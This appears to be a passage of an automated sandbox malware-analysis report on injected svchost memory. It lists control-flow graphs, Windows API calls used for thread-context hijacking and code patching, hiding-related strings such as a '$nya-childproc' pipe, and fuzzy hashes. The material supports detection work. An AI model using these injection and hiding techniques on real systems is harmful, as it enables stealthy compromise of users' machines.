2a66130a5f3-2a66130a643 call 2a661309634 call 2a661309838 264->279 268->208 284 2a66130a33c-2a66130a35c call 2a661309324 * 2 call 2a66130b1dc 268->284 269->268 273 2a66130a318-2a66130a323 269->273 273->268 278 2a66130a325-2a66130a32a 273->278 278->205 278->268 279->217 287 2a66130a4e7-2a66130a4ee 281->287 288 2a66130a4b1-2a66130a4d7 call 2a6613099e0 call 2a66130a96c 281->288 306 2a66130a35e-2a66130a368 call 2a66130b2cc 284->306 307 2a66130a373 284->307 292 2a66130a55f 287->292 293 2a66130a4f0-2a66130a4f4 287->293 303 2a66130a4f9-2a66130a556 call 2a66130a158 288->303 304 2a66130a4d9-2a66130a4dc 288->304 294 2a66130a564 292->294 293->255 294->245 303->294 304->281 311 2a66130a36e-2a66130a6d1 call 2a661308f84 call 2a66130ad28 call 2a661309178 306->311 312 2a66130a6d2-2a66130a6d7 call 2a66130c2f4 306->312 307->208 311->312 312->251
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: _$6Z$csm$csm$csm
                                                          • API String ID: 849930591-752779984
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: 8eff3d94060b0506c183f273514c8ccba3cd936feb2acd8400ace85cd0207b59
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 9CD17032B047448BEB20DF65A44C39D77E8F746B99F180115EE8A67BA5DF38C489C782

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 43e8135ebb0c35559ed7a18ea80bfe305a7e894e258808c59942dfd4b27a78db
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 1031C526F04A409BEB21DF12A84C759B3E4F78AFD5F4D0525DE4A67624DF3CC45A8381

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 4d92c4ea626ffa32eb01c2e09dbf1256c5470eb48489bf0b17e285afea8dfe7e
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: 5D315921B10B458BEB10DF22A88CB5A73E9FB8AF95F484125DE4B63764EF3CC4498741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: 0c7c2ff44e90409ce568f202e36e19cbd4341ffb8efed40e0aa12b8ee976ac47
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: 15D17B22F047808BEF609F65D49C39D37ACFB46B88F185115EA8957B96DF38C0A9C742

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 438 2a661306270-2a661306297 439 2a661306299-2a6613062a8 438->439 440 2a6613062ab-2a6613062b6 GetCurrentThreadId 438->440 439->440 441 2a6613062b8-2a6613062bd 440->441 442 2a6613062c2-2a6613062c9 440->442 443 2a6613066ef-2a661306706 call 2a661308070 441->443 444 2a6613062db-2a6613062ef 442->444 445 2a6613062cb-2a6613062d6 call 2a6613060a0 442->445 446 2a6613062fe-2a661306304 444->446 445->443 449 2a66130630a-2a661306313 446->449 450 2a6613063d5-2a6613063f6 446->450 453 2a66130635a-2a6613063cd call 2a661304c50 call 2a661304bf0 call 2a661304bb0 449->453 454 2a661306315-2a661306358 call 2a661313a40 449->454 456 2a6613063fc-2a66130641c GetThreadContext 450->456 457 2a66130655f-2a661306570 call 2a661307bff 450->457 467 2a6613063d0 453->467 454->467 460 2a66130655a 456->460 461 2a661306422-2a661306443 456->461 470 2a661306575-2a66130657b 457->470 460->457 461->460 469 2a661306449-2a661306452 461->469 467->446 473 2a6613064d2-2a6613064e3 469->473 474 2a661306454-2a661306465 469->474 475 2a66130663e-2a66130664e 470->475 476 2a661306581-2a6613065d8 VirtualProtect FlushInstructionCache 470->476 482 2a661306555 473->482 483 2a6613064e5-2a661306503 473->483 478 2a661306467-2a66130647c 474->478 479 2a6613064cd 474->479 485 2a66130665e-2a66130666a call 2a661305530 475->485 486 2a661306650-2a661306657 475->486 480 2a661306609-2a661306639 call 2a661307fdc 476->480 481 2a6613065da-2a6613065e4 476->481 478->479 488 2a66130647e-2a6613064c8 call 2a6613040b0 SetThreadContext 478->488 479->482 480->470 481->480 489 2a6613065e6-2a661306601 call 2a661304ad0 481->489 483->482 491 2a661306505-2a66130654c call 2a661304040 483->491 499 2a66130666f-2a661306675 485->499 486->485 492 2a661306659 call 2a661304b20 486->492 488->479 489->480 491->482 505 2a661306550 call 2a661307c1d 491->505 492->485 503 2a6613066b7-2a6613066d5 499->503 504 2a661306677-2a6613066b5 ResumeThread call 2a661307fdc 499->504 507 2a6613066d7-2a6613066e6 503->507 508 2a6613066e9 503->508 504->499 505->482 507->508 508->443
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID: _$6Z
                                                          • API String ID: 1666949209-452956228
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: 9e6d1a6d23f99b2325e117ac05e129a6918d3a22a01063be85214e515cd655ba
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 79D1BA76604B8882DA70DB0AE49835A77E4F3C9F89F140116EACE577A9CF3CC589CB41

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 510 2a66130104c-2a6613010b9 RegQueryInfoKeyW 511 2a6613010bf-2a6613010c9 510->511 512 2a6613011b5-2a6613011d0 510->512 511->512 513 2a6613010cf-2a66130111f RegEnumValueW 511->513 514 2a6613011a5-2a6613011af 513->514 515 2a661301125-2a66130112a 513->515 514->512 514->513 515->514 516 2a66130112c-2a661301135 515->516 517 2a661301147-2a66130114c 516->517 518 2a661301137 516->518 519 2a661301199-2a6613011a3 517->519 520 2a66130114e-2a661301193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 517->520 521 2a66130113b-2a66130113f 518->521 519->514 520->519 521->514 522 2a661301141-2a661301145 521->522 522->517 522->521
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: b836365c34d592cddc1f2c437e1d454bb1563a5ff996a1d7934b65f5a6e91958
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: B7417E32614B80DBE764CF21E44839A77B5F38AF99F488129DA8A17B58DF3CC449CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\$nya-childproc
                                                          • API String ID: 166002920-3933612297
                                                          • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction ID: 01ba6e6857320073161db12d4c91d197189d3201306d29c150b2e464a9aba7b5
                                                          • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                          • Instruction Fuzzy Hash: 06113736A14B4083E710CB61F41D35AB7A4F38AFA5F980215EA9A13AA8CF3CC148CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 87362bcaa3792e5a4c3bde22928b52a8af9d2be7a5753092e360eb08d433d8a6
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 6E815821F0028187FB54AB75E84E399629DAF87F88F5C4125DA48877D6DF3CC9CD8642
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 21ed0e38a9b9bf3c3add615de4281dd6299f8a96e3642e169298de0fb22c4a2b
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: BA81F621F0064087FA60AB25944D3A963DCAB87F86F4C40189A8BB7796DF3CC84D9782
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: _$6Z$_$6Z$_$6Z$_$6Z$_$6Z
                                                          • API String ID: 3215553584-3921938813
                                                          • Opcode ID: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
                                                          • Instruction ID: 3b2bb9e880446d885a92473a28aba255902e4424a1e3e630c19797b1845b3aac
                                                          • Opcode Fuzzy Hash: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
                                                          • Instruction Fuzzy Hash: 9661B032F0064097FA689B29954C36A6AECA787F42F1D4415CA0B33795DF3CC98D86CB
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B31
                                                          • GetLastError.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B69
                                                          • FreeLibrary.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 76f1246603c3bb18419f38d00aeba41769e0225165ea4a687267aa0e8093a868
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 4A316F21B12A4093EE11DF16980C7A563DCB746FA1F9D0625DD1E67790EF3CC4488392
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: 6b32f3e46a1ce7fd8b8de312a58a35e07da95ba2daee6ad35c98ddecb6655408
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: BA116025B10B4087E751DB52E85E71976A8F78AFE4F484224EA5F97B94CF3CC4088741
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 0f8a66e6ed77636f1ed0b2f14fd8b528f712069ee59a874cfe4a1d755408b165
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 9851E335B01B4587EF05EF28E95C29423E9BB06F45F880825A56E273A5EF7CC91CC382
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 24c8eb1c721162300a2066dfa6783493146a81dc3e88787b83f96c66ce783b45
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 5E319121B01B598BEA11DF16A98CB2963E8FB46F95F0C4020CF4A27B55EF3CC4698741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID: _$6Z
                                                          • API String ID: 2718003287-452956228
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: 268e0bf64f58330974bbaba108ddf57cd07ff1ee40941de8d1ad56834876199e
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: 88D1EC32B14A808AE711CFB6D5482DC37B9F356B98F584216DE5EA7B99DF38C00AC341
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: 7914e069732184c8871121057e80f01b9ca265f513d2dd47937bd77fb910ee0a
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: BC112E25F1024043FA586B31685E76E22DEAB87FA2F5C4624A867773C6DF2CC4094396
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 506df8d917f2bc76aafa583f77b387a4aae76c161c2f169f50604e846a94c7eb
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: CF011731B14A8087EA14DB52A89C35963A9FB8AFC5F8840359E9E53B54DF3CC989C781
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
